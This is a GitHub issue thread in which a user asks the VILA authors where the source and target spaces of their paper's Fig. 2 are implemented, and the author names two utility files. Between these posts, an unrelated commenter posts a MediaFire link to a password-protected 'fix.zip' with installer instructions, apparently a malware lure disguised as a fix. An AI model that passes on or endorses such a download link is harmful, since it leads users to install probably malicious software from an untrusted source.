### ISSUE TITLE
Question about the space.

### ISSUE THREAD

**Issue by Yxxxb** [jiaangli/VILA#6]
Hi authors,

Congratulations on a great work!
I did not go over every line of code but could you please help to point out how you implement the source or target space in Fig.2 of your paper?

Thanks.

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jiaangli** [comment]
Thanks for your kind words.

You can check the implementation code in src/utils/llm_rep_utils.py and src/utils/vm_rep_utils.py.
